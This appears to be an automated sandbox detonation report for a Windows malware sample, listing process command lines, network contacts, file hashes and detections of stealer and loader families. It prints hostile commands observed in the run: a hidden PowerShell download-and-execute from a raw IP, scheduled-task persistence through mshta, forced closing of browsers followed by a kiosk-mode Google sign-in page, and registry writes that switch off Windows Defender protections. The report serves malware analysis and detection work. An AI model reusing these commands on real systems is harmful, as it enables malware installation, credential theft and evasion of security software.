"C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "KuBZrmaKyUJ" /tr "mshta \"C:\Temp\VNx3gTICP.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\VNx3gTICP.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe

"C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 1020

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe

"C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe"

C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe

"C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {39E3C316-04D7-43F7-8E3A-F5C9C00AD883} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\ProgramData\rbkvgg\bdhx.exe

C:\ProgramData\rbkvgg\bdhx.exe

C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe

"C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1204

C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe

"C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe"

C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe

"C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.0.1404389395\1587828078" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1244 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b681ec8d-5d35-487d-8b3e-c7bb73e798bb} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1352 101d8c58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.1.1074487475\2015986347" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8f1d330-493f-4204-865d-da67d0e22595} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1544 eeeb258 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.2.122218642\1120858895" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a181cd1-bc5b-461d-b6bb-1934de5fb0e0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2000 19f72158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.3.258885724\1036051148" -childID 2 -isForBrowser -prefsHandle 2756 -prefMapHandle 2752 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0887fe63-5db0-427d-9249-418af38093f7} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2768 1b31bd58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.4.783715881\1406145648" -childID 3 -isForBrowser -prefsHandle 3868 -prefMapHandle 3864 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {157a3b0f-d809-4fad-9176-d73dc0da1f4d} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3880 207da558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.5.1641785714\443642166" -childID 4 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {753f3ee8-a3e6-4ddb-8e77-4a5ec56d69a5} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3976 207dba58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.6.300588055\2014769721" -childID 5 -isForBrowser -prefsHandle 4192 -prefMapHandle 4196 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78747322-58cb-47c8-ae37-fd689bb247b0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 4180 1f641a58 tab

C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe

"C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe"

C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 500

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp

Files


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\5baa7cac-9e65-4bcc-8c21-16ff4b485bf8

MD5 3ebf505728f14089505ae776d2617f90
SHA1 5219407902814412ba6b0114c41e530c3a99ffb2
SHA256 3d5e2a0e36a6d7d80c792f43e6f45f87d0a4aa4e916a80e6d1402d489e0b912a
SHA512 1a75c82ccef06516cb6009e409bd8dbfd27c43ae286b9fd8c56ece17ec892487bae100eab067ae3f2c848cfd13e8f91a855269d64e276fae62d298732cd062cb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin

MD5 58828ad0b120d2dc2cf0e40337d66a9d
SHA1 681719ea2bf9fe4795fa4b0ce8cc8659a8d72a7d
SHA256 b9fe9bc8fac0b7585a2b3fa24c2926455fbde3c41916af7dc21825b450f65b0d
SHA512 a887db85dbb2e7b30e6084e1ff2dd8f58f0f40aebeddbedc84e8509455f04bd06119bc7f7a33b2b8ae4f0716a0d47d288f586b967be21913485496f3471e40e2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 bece0acf9d7f19d01c7943c54d2ad372
SHA1 aef59ca4b0fe97f32db128e103bfb98aee3b5e29
SHA256 ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8
SHA512 105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\activity-stream.discovery_stream.json.tmp

MD5 c3cab17ab48f8809df218acc0ade40c7
SHA1 bea265716841ab083d20c437c03da3ff0eec00c5
SHA256 a3e54d843937797b2fbd26e15de8230cdbc56fa2e1b1d172a7a86851aed5cac9
SHA512 e4ed4177cfd9f3bf15ccab895fc4d9e81b0e283c77e2a30fc86c5184fd4d5a0ae903783a464ba0341bdce814aad5a3868167542337705fdbb78e8e4ae41ec262

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 4953a89ce8cbb66ee988c96c67d81715
SHA1 6515b00939e294f22782a5fbb6986964319025c8
SHA256 6405cf0055af4b501e8ed7cb3081377f7f0afb7a0bc698bbd333616012622beb
SHA512 8d1cc1efd81e3ada365ea87b847f3324d12332012569903b1173910047e0944647d76baad0cbd95d3eca9068b9d048629803313db721c94ca173533ce429e563

memory/2384-597-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/3264-611-0x0000000000A90000-0x0000000000EDE000-memory.dmp

memory/3264-610-0x0000000000A90000-0x0000000000EDE000-memory.dmp

memory/2728-649-0x0000000000B70000-0x000000000102C000-memory.dmp

memory/2384-656-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5cd1beef6b9c8ce2a5ee1e02606dae4e
SHA1 0083140d4defd415e2d1e4dd5a0c3b549ce6c400
SHA256 9d6a090c3dc1c8eb05c27d703c3d54d39509984c68b8da72cd1bc5c6d2e9e3b4
SHA512 50f1104266ccaeba2b692f7200a5e48c36d1f7660b9c2e8c31c9ada46859a34c31d7106502a2ddaea684075f77c1cb7d21657127c040c6f3fdb79d37b482a04c

memory/2728-666-0x0000000000B70000-0x000000000102C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2384-679-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 f2dc130a148910bf9103aa63524d23fe
SHA1 91245401f4245f796659165d8814c2557e09a6cc
SHA256 f8d57782a79728f287f8ef77f7042ed6f182f3ec5485298176acd8716aa1bcfb
SHA512 10abb5d662c902ff6d357d67a1f18ae531652e05d9eb73b762d1aa9eae3309e7eecb0649685bbbaa8224a506eed276e3e56d0800bee3bc80b53e9d57fb3278e4

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 9e9504c75fa9b52b78f45c4d6f889e41
SHA1 f1e4fbb8a4e9c55be920b336c8293ca9c69fc9d4
SHA256 6128b076e58a745aed2e2c3f22c6c2f48bb0bedbdd7d857d58d8ab38484a084d
SHA512 6c891da218a30cf0bbfb6977afb472ee879e5395eefdf80bd0372b732ba0db5f6f679c45d82dce1fb2f3ea24710420a6a207b174d54934fcab7b2dc6b88951d1

memory/2728-775-0x0000000000B70000-0x000000000102C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/3512-789-0x0000000000980000-0x00000000009E0000-memory.dmp

memory/2384-790-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3992-792-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\1D771913E5AD471F.dat

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/4932-848-0x0000000000230000-0x0000000000242000-memory.dmp

memory/4932-849-0x0000000000150000-0x0000000000160000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 02:01

Reported

2025-03-06 02:04

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer

Detects Healer an antivirus disabler dropper


GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
